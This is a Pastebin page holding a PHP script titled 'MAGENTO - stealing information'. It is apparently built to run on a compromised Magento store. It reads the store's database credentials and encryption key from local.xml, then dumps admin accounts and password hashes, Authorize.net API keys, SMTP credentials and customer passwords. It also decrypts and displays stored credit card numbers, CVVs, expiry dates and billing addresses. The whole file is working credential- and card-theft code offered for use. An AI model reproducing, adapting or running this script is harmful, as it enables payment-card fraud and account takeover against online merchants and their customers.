SHARE
TWEET

MAGENTO - stealing information

greyx Apr 30th, 2017 (edited) 34 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. @set_time_limit(0);
  3.  
  4. echo'<head>
  5. <title>MAGENTO - stealing information</title>
  6. </head>
  7. <div id="page-wrap">
  8. <body>
  9. <style type="text/css">
  10. body,table { font-family:verdana;font-size:9px;color:#CCCCCC;background-color:#333333; }
  11. table { width:100%; border-color:#333333;border-width:0pt 1pt; border-style:solid; }
  12. td {background-color: #000500; font-family: Courier New; font-size:8pt; color:#999999; border-color:#FFFFFF; border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}
  13. A:Link, A:Visited { color: #999999; text-decoration: none; }
  14. A.no:Link, A.no:Visited { text-decoration: none; }
  15. A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #666666; background-color:#333333; text-decoration: none; }
  16. input,select,option { font:8pt tahoma;color:#666666;margin:2;border:1px solid #666666; }
  17. textarea { color:#666666;font:verdana bold;border:1px solid ;margin:2; }
  18. .fleft { float:left;text-align:left; }
  19. .fright { float:right;text-align:right; }
  20. #pagebar { font:8pt tahoma;padding:5px; border:3px solid #333333; border-collapse:collapse; }
  21. #pagebar td { vertical-align:top; }
  22. #pagebar p { font:8pt tahoma;}
  23. #pagebar a { font-weight:bold;color:#666666; }
  24. #pagebar a:visited { color:#00CE00; }
  25. #mainmenu { text-align:center; }
  26. #mainmenu a { text-align: center;padding: 0px 5px 0px 5px; }
  27. #maininfo,.barheader,.barheader2 { text-align:center; }
  28. #maininfo td { padding:3px; }
  29. .barheader { font-weight:bold;padding:5px; }
  30. .barheader2 { padding:5px;border:2px solid #333333; }
  31. .contents,.explorer { border-collapse:collapse;}
  32. .contents td { vertical-align:top; }
  33. .mainpanel { border-collapse:collapse;padding:5px; }
  34. .barheader,.mainpanel table,td { border:1px solid #333333; }
  35. .mainpanel input,select,option { border:1px solid #333333;margin:0; }
  36. input[type="submit"] { border:1px solid #333333; }
  37. input[type="text"] { padding:3px;}
  38. .fxerrmsg { color:red; font-weight:bold; }
  39. #pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; }
  40. #pagebar,.mainpanel,input[type="submit"] { background-color:black; }
  41. .barheader2,input,select,option,input[type="submit"]:hover { background-color:black; }
  42. textarea,.mainpanel input,select,option { background-color:#000000; }
  43. // -->
  44. </style>
  45.  
  46. <body bgcolor="#ffffff" >
  47.  
  48. <center>
  49. <br>
  50. <FORM action=""  method="post">
  51. <div align="center">[M A G E N T O] - Stealing Information<br>
  52. <div align="center">coder: sohai & n4KuLa_<br>
  53. <input type="hidden" name="form_action" value="2">
  54. </div>
  55. </div>
  56. ';
  57.  
  58.  
  59. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
  60.     $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
  61.     if(isset($xml->global->resources->default_setup->connection)) {
  62.        $connection = $xml->global->resources->default_setup->connection;
  63.        $prefix = $xml->global->resources->db->table_prefix;
  64.        $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
  65.        require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
  66.        
  67.        try {
  68.            $app = Mage::app('default');
  69.            Mage::getSingleton('core/session', array('name'=>'frontend'));
  70.        }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}
  71.  
  72.        if (!mysql_connect($connection->host, $connection->username, $connection->password)){
  73.            print("Could not connect: " . mysql_error());
  74.        }
  75.        mysql_select_db($connection->dbname);
  76.        echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";
  77.  
  78.     $crypto = new Varien_Crypt_Mcrypt();
  79.     $crypto->init($key);
  80.  
  81.     //=========================================================================================================
  82.     $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
  83.     if (!$query){
  84.           echo "<center><b>Gagal</b></center>";
  85.     }else{
  86.             $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
  87.           echo'<br><br>
  88.                ====================================================================<br>
  89.                                [ Admin FROM website : '.$site['website'].'] <br>
  90.                ====================================================================<br>';
  91.     }
  92.     echo "
  93.    <table border='1' align='center' >
  94.    <tr>
  95.    <td>id</td>
  96.    <td>firstname</td>
  97.    <td>lastname</td>
  98.    <td>email</td>
  99.    <td>username</td>
  100.    <td>password</td>
  101.    </tr>";
  102.         while($vx = mysql_fetch_array($query)) {
  103.         $no = 1;
  104.         $user_id = $vx['user_id'];
  105.         $username = $vx['username'];
  106.         $password = $vx['password'];
  107.         $email = $vx['email'];
  108.         $firstname = $vx['firstname'];
  109.         $lastname = $vx['lastname'];
  110.         echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";
  111.         }
  112.     echo "</table><br>";
  113.     //=========================================================================================================
  114.     $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where  path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
  115.     if(mysql_num_rows($query) != 0){
  116.         if (!$query){
  117.               echo "<center><b>Gagal</b></center>";
  118.         }else{
  119.               echo'<br><br>
  120.                    ====================================================================<br>
  121.                                    [ Authorizenet ] <br>
  122.                    ====================================================================<br>';
  123.         }
  124.         echo "
  125.        <table border='1' align='center' >
  126.        <tr>
  127.        <td>no</td>
  128.        <td>user</td>
  129.        <td>pass</td>  
  130.        </tr>";
  131.             $no = 1;
  132.             while($vx = mysql_fetch_array($query)) {
  133.             $user = $crypto->decrypt($vx['user']);
  134.             $pass = $crypto->decrypt($vx['pass']);
  135.  
  136.            
  137.             echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  138.             $no++;
  139.             }
  140.         echo "</table><br>";
  141.     }
  142.     //=========================================================================================================
  143.     $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
  144.     if(mysql_num_rows($query_smtp) != 0){
  145.         if (!$query_smtp){
  146.               echo "<center><b>Gagal</b></center>";
  147.         }else{
  148.               echo'<br><br>
  149.                    ====================================================================<br>
  150.                                    [ SMTP ] <br>
  151.                    ====================================================================<br>';
  152.         }
  153.         echo "
  154.        <table border='1' align='center' >
  155.        <tr>
  156.        <td>no</td>
  157.        <td>host</td>      
  158.        <td>port</td>
  159.        <td>user</td>
  160.        <td>pass</td>  
  161.        </tr>";
  162.             $no = 1;
  163.             $batas = 0;
  164.             while($rows = mysql_fetch_array($query_smtp)) {
  165.                 $smtphost = $rows[0];
  166.                 $smtpport = $rows[1];
  167.                 $smtpuser = $rows[2];
  168.                 $smtppass = $rows[3];
  169.                 echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";
  170.                 $no++;
  171.             }
  172.         echo "</table><br>";
  173.     }
  174.     //=========================================================================================================
  175.     $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
  176.     $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
  177.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){
  178.           echo'<br><br>
  179.                ====================================================================<br>
  180.                                [ Credit Card ] <br>
  181.                ====================================================================<br>';
  182.             echo "
  183.            <table border='1' align='left' >
  184.            <tr>
  185.            <td>no</td>
  186.            <td>Date</td>
  187.            <td>Credit Owner</td>
  188.            <td>method</td>
  189.            <td>Credit Number</td>
  190.            <td>Credit Exp</td>
  191.            <td>CVV</td>
  192.            <td>Address</td>
  193.            </tr>";
  194.                 $no = 1;
  195.                 $batas = 0;
  196.                 while($vx = mysql_fetch_array($query)){
  197.                 $date = $vx['updated_at'];
  198.                 $cc_owner = $vx['cc_owner'];
  199.                 $method = $vx['method'];
  200.                 $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
  201.                 $exp = $vx['exp'];      
  202.                 $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);  
  203.                 $Billing_Address = $vx['Billing Address'];
  204.                 echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";
  205.                 $batas = $no++;
  206.                 }
  207.                
  208.                 while($vx2 = mysql_fetch_array($query2)){
  209.                     $batas +=1;
  210.                 $cc_owner = $vx2['cc_owner'];
  211.                 $method = $vx2['method'];
  212.                 $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
  213.                 $exp = $vx2['exp'];    
  214.                 $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
  215.                 $Billing_Address = $vx2['Billing Address'];
  216.                 echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";
  217.                  $batas++;
  218.                 }    
  219.                
  220.             echo "</table><br>";    
  221.     }
  222.     //=========================================================================================================
  223.     $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
  224.     $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");
  225.    
  226.    
  227.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){
  228.         if (!$query){
  229.               echo "<center><b>Gagal</b></center>";
  230.         }else{
  231.               echo'<br><br>
  232.                    ====================================================================<br>
  233.                                    [ Customer ] <br>
  234.                    ====================================================================<br>';
  235.         }
  236.         echo "
  237.        <table border='1' align='center' >
  238.        <tr>
  239.        <td>no</td>
  240.        <td>user</td>
  241.        <td>pass</td>  
  242.        </tr>";
  243.             $no = 1;
  244.             $batas = 0;
  245.             while($vx = mysql_fetch_array($query)) {
  246.                 $user = $vx['email'];
  247.                 $pass = $vx['value'];
  248.                 echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  249.                 $batas = $no++;
  250.             }
  251.            
  252.             if(mysql_num_rows($query2) != 0 && ($query2)){
  253.                 while($vx2 = mysql_fetch_array($query2)){
  254.                     $user = $vx2['customer_email'];
  255.                     $pass = $crypto->decrypt($vx2['password_hash']);
  256.                     if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin
  257.                         $batas +=1;
  258.                         echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";
  259.                         $batas++;
  260.                     }
  261.                 }              
  262.             }
  263.        
  264.         echo "</table><br>";
  265.     }
  266.     //=========================================================================================================
  267.   }
  268. }
  269. function save($format,$data){
  270.     $fp = fopen($format, 'a');
  271.     fwrite($fp, $data);
  272.     fclose($fp);
  273. }
  274. function cekbase64($string){
  275.         $decoded = base64_decode($string, true);
  276.         if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
  277.         if(!base64_decode($string, true)) return false;
  278.         if(base64_encode($decoded) != $string) return false;
  279.         return true;//nilai return 1 jika true
  280.     }
  281. //----untuk decode password ---/
  282. class Varien_Crypt_Mcrypt{
  283.     /**
  284.      * Constuctor
  285.      *
  286.      * @param array $data
  287.      */
  288.     public function __construct()
  289.     {
  290.     }
  291.  
  292.     /**
  293.      * Initialize mcrypt module
  294.      *
  295.      * @param string $key cipher private key
  296.      * @return Varien_Crypt_Mcrypt
  297.      */
  298.     public function init($key)
  299.     {
  300.         $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
  301.         $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
  302.         $maxKeySize = mcrypt_enc_get_key_size($this->handler);
  303.  
  304.         if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
  305.             //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
  306.             return null;
  307.         }
  308.  
  309.         mcrypt_generic_init($this->handler, $key, $iv);
  310.  
  311.         return $this;
  312.     }
  313.  
  314.     /**
  315.      * Encrypt data
  316.      *
  317.      * @param string $data source string
  318.      * @return string
  319.      */
  320.     public function encrypt($data)
  321.     {
  322.         if (!$this->handler) {
  323.             //throw new Varien_Exception('Crypt module is not initialized.');
  324.             return null;
  325.         }
  326.         if (strlen($data) == 0) {
  327.             return $data;
  328.         }
  329.         return base64_encode(mcrypt_generic($this->handler, $data));
  330.     }
  331.  
  332.     /**
  333.      * Decrypt data
  334.      *
  335.      * @param string $data encrypted string
  336.      * @return string
  337.      */
  338.     public function decrypt($data)
  339.     {
  340.         if (!$this->handler) {
  341.             //throw new Varien_Exception('Crypt module is not initialized.');
  342.             return null;
  343.         }
  344.         if (strlen($data) == 0) {
  345.             return $data;
  346.         }
  347.         return mdecrypt_generic($this->handler, base64_decode($data));
  348.     }
  349.        
  350.  
  351.     /**
  352.      * Desctruct cipher module
  353.      *
  354.      */
  355.     public function __destruct()
  356.     {
  357.         if ($this->handler) {
  358.             $this->_reset();
  359.         }
  360.     }
  361.  
  362.     protected function _reset()
  363.     {
  364.         mcrypt_generic_deinit($this->handler);
  365.         mcrypt_module_close($this->handler);
  366.     }
  367. }
  368.  
  369. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top